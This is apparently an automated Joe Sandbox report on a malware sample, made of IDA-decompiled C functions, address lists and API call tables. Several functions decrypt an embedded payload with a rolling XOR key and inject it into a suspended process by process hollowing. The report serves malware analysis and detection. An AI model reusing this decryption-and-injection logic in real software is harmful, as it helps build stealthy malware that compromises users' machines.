    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
